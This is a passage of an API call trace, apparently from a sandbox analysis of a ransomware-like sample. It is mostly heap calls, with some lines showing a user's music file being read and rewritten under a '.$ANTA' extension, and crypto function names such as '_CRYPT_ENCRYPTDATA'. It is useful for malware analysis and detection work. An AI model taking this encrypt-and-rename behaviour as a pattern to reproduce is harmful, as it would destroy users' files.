Flags=0x0, Size=0x8) returned 0x43e25a0 [0112.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0112.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0112.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0112.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0112.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0112.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0112.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0112.415] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0112.415] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0112.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0112.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0112.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0112.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0112.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0112.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0112.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0112.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0112.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0112.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0112.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0112.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0112.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0112.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0112.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0112.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0112.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0112.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0112.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0112.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0112.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0112.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0112.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0112.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0112.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0112.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0112.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0112.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0112.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0112.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a0e0 [0112.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0112.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369c10 [0112.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e220 | out: hHeap=0x1780000) returned 1 [0112.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0112.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0112.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0112.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0112.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0112.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a0e0 | out: hHeap=0x1780000) returned 1 [0112.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0112.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0112.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0112.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0112.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a450 [0112.417] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u")) returned 0x10 [0112.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a450 | out: hHeap=0x1780000) returned 1 [0112.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0112.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369c10 | out: hHeap=0x1780000) returned 1 [0112.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0112.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0112.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0112.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0112.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0112.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0112.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0112.662] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\JUnckwz0f9.wav.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\junckwz0f9.wav.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0112.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0112.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0112.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0112.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0112.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0112.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0112.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0112.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0112.663] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0112.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0112.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0112.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0112.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0112.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0112.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0112.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0112.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0112.663] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0112.663] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0112.663] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0112.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0112.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0112.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0112.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0112.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0112.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0112.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0112.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0112.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0112.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0112.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0112.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0112.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0112.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0112.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0b020 [0112.667] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0112.667] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x10000, lpOverlapped=0x0) returned 1 [0112.670] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x6fbe, lpOverlapped=0x0) returned 1 [0112.671] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0112.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0112.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0112.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0112.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0112.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16fbe) returned 0x4516010 [0112.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0b020 | out: hHeap=0x1780000) returned 1 [0112.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0112.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0112.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0112.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0112.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0112.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16fbe) returned 0x452cfd8 [0112.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0112.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0112.674] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0112.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0112.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0112.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0112.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0112.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16fbe) returned 0x4516010 [0112.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0112.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0112.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0112.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0112.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0112.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0112.674] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0112.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0112.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0112.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0112.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0112.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0112.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0112.675] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0112.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0112.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0112.675] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0112.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0112.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0112.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0112.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25b0 [0112.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0112.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0112.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0112.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0112.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16fbe) returned 0x4516010 [0112.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0112.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2620 [0112.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0112.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0112.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0112.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2710 [0112.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0112.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0112.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0112.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2530 [0112.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0112.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0112.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0112.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0112.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0112.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0112.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0112.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0112.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0112.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16fbe) returned 0x499a008 [0112.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0112.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0112.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0112.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0112.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0112.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0112.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0112.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0112.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0112.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0112.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0112.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0112.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0112.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0112.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0112.677] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0112.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0112.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0112.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0112.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0112.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0112.677] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0112.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0112.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0112.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0112.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0112.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0112.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0112.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0112.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0112.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0112.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0112.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0112.677] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0112.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0112.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0112.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0112.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0112.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0112.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0112.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0112.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0112.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca730 [0112.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0112.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0112.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0112.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0112.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0112.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0112.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0112.678] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0112.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0112.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0112.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0112.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0112.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 